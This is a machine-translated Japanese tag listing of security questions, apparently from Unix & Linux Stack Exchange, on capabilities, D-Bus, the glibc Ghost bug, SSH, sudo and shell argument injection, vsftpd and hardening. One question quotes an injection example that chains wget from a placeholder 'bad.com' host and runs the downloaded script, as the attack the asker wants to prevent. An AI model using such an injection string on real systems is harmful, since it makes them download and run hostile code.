タグ付けされた質問 「security」

NTPを使用してネットワーク時間を変更し、2台のコンピューターを同期するアプリケーションを開発しました。rootLinuxで時刻と日付を変更できるのは後者だけなので、として実行されます（推測します）。 今、私はユーザーとしてそれを実行したい。しかし、私は時間にアクセスする必要があります。 root以外のユーザーアカウントでデーモンを実行することをお勧めしますか？ アプリケーションに次のような機能を与えましょうCAP_SYS_TIMEか？ セキュリティの脆弱性は発生しませんか？ もっと良い方法はありますか？

13 security  daemon  access-control 

D-Busへのリモートアクセスを設定しようとしていますが、認証と承認がどのように機能するか（理解できない）を理解していません。 抽象ソケットでリッスンするD-Busサーバーがあります。 $ echo $DBUS_SESSION_BUS_ADDRESS unix:abstract=/tmp/dbus-g5sxxvDlmz,guid=49bd93b893fe40d83604952155190c31 私はdbus-monitor何が起こっているか見に走ります。私のテストケースはnotify-send hello、ローカルマシンから実行されたときに機能します。 同じマシン上の別のアカウントから、そのバスに接続できません。 otheraccount$ DBUS_SESSION_BUS_ADDRESS=unix:abstract=/tmp/dbus-g5sxxvDlmz,guid=49bd93b893fe40d83604952155190c31 dbus-monitor Failed to open connection to session bus: Did not receive a reply. Possible causes include: the remote application did not send a reply, the message bus security policy blocked the reply, the reply timeout expired, or the network …

13 security  authentication  tcp  d-bus  authorization 

んゴーストの脆弱性が問題になっている、影響をOSに（ユーザーでログインしているのように）アクセスを必要としますか？誰かが「アプリケーションを呼び出すことができるリモート攻撃者」を明確にすることはできますか？ローカルシステムで直接実行するテストを見つけるだけで、リモートホストからではないようです。 複数のソース（それらのソースに対するクレジット）からGhostの脆弱性に関してこれまでに収集したすべての情報は、他の誰かが興味を持っている場合の回答として以下に投稿しました。 編集、私の答えを見つけました： コード監査中に、Qualysの研究者はglibcの__nss_hostname_digits_dots（）関数にバッファオーバーフローを発見しました。このバグは、すべてのgethostbyname *（）関数を介してローカルおよびリモートの両方でトリガーできます。アプリケーションは、主にgethostbyname *（）関数セットを介してDNSリゾルバーにアクセスできます。これらの関数は、ホスト名をIPアドレスに変換します。

13 linux  security  glibc  vulnerability  distributions 

接続クライアントサーバーでsshが使用する（認証後の）対称暗号化のタイプを知りたい。誰が暗号化を決定するのかわかりません。クライアントまたはサーバー？ 私は/etc/ssh/ssh_config（クライアント上）と/etc/ssh/sshd_config（サーバー上）を見ましたが、何も見ませんでした。

13 ssh  security  encryption 

シミュレーターに渡すカスタムオプションをユーザーが指定できるようにする必要があるラッパーアプリケーションがあります。ただし、ユーザーがユーザーオプションを使用して他のコマンドを挿入しないようにします。これを達成する最良の方法は何ですか？ 例えば。 ユーザーが提供するもの： -a -b アプリケーションの実行： mysim --preset_opt -a -b しかし、私はこれが起こることを望まない： ユーザーが提供するもの： && wget http:\\bad.com\bad_code.sh && .\bad_code.sh アプリケーションの実行： mysim --preset_opt && wget http:\\bad.com\bad_code.sh && .\bad_code.sh 現在、ユーザーが提供したすべてのオプションを単一引用符で囲み、ユーザーが提供した単一引用符'を取り除くだけで、最後の例のコマンドが無害になることができると考えています： mysim -preset_opt '&&' 'wget' 'http:\\bad.com\bad_code.sh' '&&' '.\bad_code.sh' 注：mysimコマンドは、docker / lxcコンテナー内のシェルスクリプトの一部として実行されます。Ubuntuを実行しています。

13 bash  shell  security  quoting  arguments 

貴重な暗号キーを作成するための安全な環境として、Knoppix（または他のLive CD / DVD）を使用しています。残念ながら、そのような環境ではエントロピーは限られたリソースです。プログラムの開始ごとにかなりのエントロピーが消費されることに気付きました。これは、アドレスのランダム化が必要なスタック保護機能が原因であると思われます。 素晴らしい機能ですが、完全に役に立たず、さらに悪いことに、私のシナリオでは破壊的です。この機能を無効にする可能性はありますか？元のKnoppix（または何でも）イメージを引き続き使用でき、実行時に構成が必要なものを好むでしょう。 これはglibcが原因だと読みました。strace -p $PID -f -e trace=openプログラムを起動したときに、bashに対して/ dev / randomへのアクセスが表示されないことに驚いています。しかし、私はexecve（）とリンカーの相互作用に慣れていません。

13 linux  kernel  security 

Pingは、ユーザーIDビットが設定されたルートが所有するプログラムです。 $ ls -l `which ping` -rwsr-xr-x 1 root root 35752 Nov 4 2011 /bin/ping 私が理解しているように、ユーザーがpingプロセスを実行すると、実際のユーザーID（プロセスを起動した人のユーザーID）からユーザーIDルートに変わります。ただし、これを試し、psの出力を見て、pingプロセスがルートユーザーとして実行されているかどうかを確認しても、実際のユーザーIDが表示されます。 ps -e -o user,ruser,euser,cmd,args | grep ping sashan sashan sashan ping -i 10 -c 1000 www.goog ping -i 10 -c 1000 www.google.com

13 security  process  ping  privileges  setuid 

私のウェブサーバーはさまざまなIPアドレスによって常に攻撃されています。5つのパスワードを試してから、IPアドレスを変更します。 ssh-keysを使用してパスワードを許可しない、リモートrootログインを許可しないなど、さまざまなロックダウンを行いました。 これらの攻撃の試みを取り除くためにできることはありますか？それに失敗した場合、私が我慢すべき具体的な防御策はありますか？

13 ssh  security 

この質問は完全に一般的なものであり、私の状況にのみ適用されるわけではありません。たとえば、DHCPを有効にする次の小さなスクリプトのよう$1に、コマンドライン（!!）で送信する変数（）は、送信するホスト名のみです。 #!/bin/bash udhcpc -b -i eth0 -h $1 このようにudhcpcを実行するにはルートアクセスが必要なので、これを行う/etc/sudoersには、次の行を含むように変更する予定です。 joe ALL = NOPASSWD: /path/to/enable_dhcp.sh 次のコマンドを実行するだけで、「joe」がそのスクリプトをルート権限で簡単に実行できるようになります sudo /path/to/enable_dhcp.sh パスワードを求められない（これは、joeがこれをスクリプト化できるようにするためです）。 今..私は、ルート権限で簡単に実行できるスクリプトで使用することは、あなたが望むものを何でも注入できるので、恐ろしいアイデアであることを知っています（または少なくとも私はそう思います）$1。 だから...これに対処する最良の方法は何ですか？インジェクション攻撃に対して広く開かれていないときに、root権限でjoeに必要なことをさせ、変数を渡す（または環境変数を使用して効果的に行う）ようにするにはどうすればよいですか？

13 bash  security  shell-script  sudo  parameter 

閉じた。この質問は意見に基づいています。現在、回答を受け付けていません。 この質問を改善したいですか？この投稿を編集して事実と引用で答えられるように質問を更新してください。 5年前に閉鎖されました。 構築して起動したいウェブサイトのアイデアがあり、それをホストする小さなVPSを取得することを考えています（私は価格でLinodeが好きで、広く推奨されているようです）。私はかなり壊れているので、管理対象サーバーを買う余裕はありません。 Ubuntu Lucid Serverをダウンロードし、VirtualBoxで実行して、学習を助け、最終的な実動サーバーに近い近似として機能するようにしました。私は学習に専念していますが、愚かな何かを見逃して妥協することになるのではないかとかなり恐れています。そのため、LAMPサーバーを保護する主なポイントを説明する優れたガイド/書籍を知りたいと思います。 私はLinodeとSlicehostのそれぞれのチュートリアルで基本的なことを行いましたが、できる限り準備したいと思います。このサイトはまだ書かれておらず、試用版として最初に共有ホストにデプロイする可能性が高いので、少なくとも基本を学ぶ時間はあります。 すべてを最新の状態に保ち、必要なホールのみを許可するようにiptablesを構成します（ssh / scp / sftpの場合はTCPポート22にのみ表示されます-（非常にマイナーな）セキュリティのためにデフォルトのポートから変更します）私はpingに応答したくない理由がないのでICMPをブロックするといういくつかのチュートリアルに混乱していますが、必要なソフトウェアを削除するだけです。必要ありません。

13 security 

私は少し迷いましたが、完全なディスク暗号化のためにどのテクノロジーを選択すべきかわかりません。そこにある情報がまだ最新かどうかを見分けるのは困難です。これに対する現在のベストプラクティスソリューションはありますか？

13 linux  security  filesystems 

現在、セキュリティの観点から、OpenBSD、FreeBSD、LinuxでのランダムPID実装を比較しています。 OpenBSDとFreeBSDに関する限り、私の仕事は終わりです。ただし、ここでの回答では、sysctl設定のおかげでランダムPIDをLinuxで有効にできると述べていますが、どの設定であるかを判断できませんでした。 インターネットでの研究は、主流のLinuxカーネルで拒否されたパッチと議論のみにつながり、grsecurity機能にも表示されません（そして、明らかに私のLinuxボックスでは、PIDはどこでもインクリメンタルで、sysctl関連するパラメータ名はなく、カーネルソースには関連するものは何も表示されませんでした）。 PIDのランダム化は実際にLinuxで利用可能ですか？

13 security  process  linux-kernel 

Fedora 16を使用して、実証済みのvsftpd構成を新しいサーバーに移動すると、問題が発生しました。すべてが正常に実行されるように見えますが、ユーザー認証は失敗します。ログに何が起こったのかを示すエントリが見つかりません。 完全な設定ファイルは次のとおりです。 anonymous_enable=NO local_enable=YES write_enable=YES local_umask=022 dirmessage_enable=YES xferlog_enable=YES connect_from_port_20=YES xferlog_file=/var/log/vsftpd.log xferlog_std_format=YES idle_session_timeout=0 data_connection_timeout=0 nopriv_user=ftpsecure connect_from_port_20=YES listen=YES chroot_local_user=YES chroot_list_enable=NO ls_recurse_enable=YES listen_ipv6=NO pam_service_name=vsftpd userlist_enable=YES tcp_wrappers=YES FTPがユーザー名とパスワードの入力を求めてきたので、それらを入力しました。ログインが間違っています。確認しましたが、このユーザーはsshからログインできます。何かが台無しにされていpam_serviceます。 匿名（許可に変更した場合）はうまく機能するようです。 SELinuxは無効です。 Ftpsecureは正常に構成されているように見えます...完全に紛失しています！ 以下は、成功せずに調べたログファイルです。 /var/log/messages /var/log/xferlog #empty /var/log/vsftpd.log #empty /var/log/secure で見つけたもの/var/log/audit/audit.log： type=USER_AUTH msg=audit(1335632253.332:18486): user pid=19528 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication acct="kate" exe="/usr/sbin/vsftpd" hostname=ip68-5-219-23.oc.oc.cox.net addr=68.5.219.23 terminal=ftp res=failed' …

13 security  ftp  authentication  pam 

クラッカーなどになろうとしているわけではありませんが、プロセスを理解しようとしています（プログラミングの観点から）。 ですから、クラッカーの主な目標を推測（推測）することは、彼が作成したソフトウェア（またはスクリプト）をインストールするためにルートアクセスを取得することですか？または、独自のカーネルモジュールをインストールすることもあります（何らかの理由で不正である）。 人々がスクリプトを使用してエクスプロイトをチェックしていることは知っていますが......方法はわかりません。彼らは既知のエクスプロイトのバージョンをチェックしています......そして、それらを見つけたら....... 私はこれがすべて非常に初心者に聞こえることを知っています。しかし、Linux / Unixシステムは非常に安全であると考えられているので、その仕組みを理解しようとしていますが、ルートアクセスを取得するプロセス（プロセス）を把握しようとしています。

13 linux  security 

Linuxでコマンドを実行して、書き込むファイルを作成または開くことができないようにしたいのですが。それでも通常どおりファイルを読み取ることができ（空のchrootはオプションではありません）、すでに開いているファイル（特にstdout）に書き込むことができます。 特定のディレクトリ（つまり、現在のディレクトリ）へのファイルの書き込みが引き続き可能かどうかは、ボーナスポイントです。 私はプロセスローカルなソリューションを探しています。つまり、システム全体のAppArmorやSELinuxなどの設定や、ルート権限を必要としません。ただし、カーネルモジュールのインストールが必要になる場合があります。 私は機能を検討していましたが、ファイルを作成する機能があれば、これらは素晴らしく簡単でした。ulimitは、このユースケースをカバーしている場合に便利な別のアプローチです。

13 linux  security  selinux  apparmor  capabilities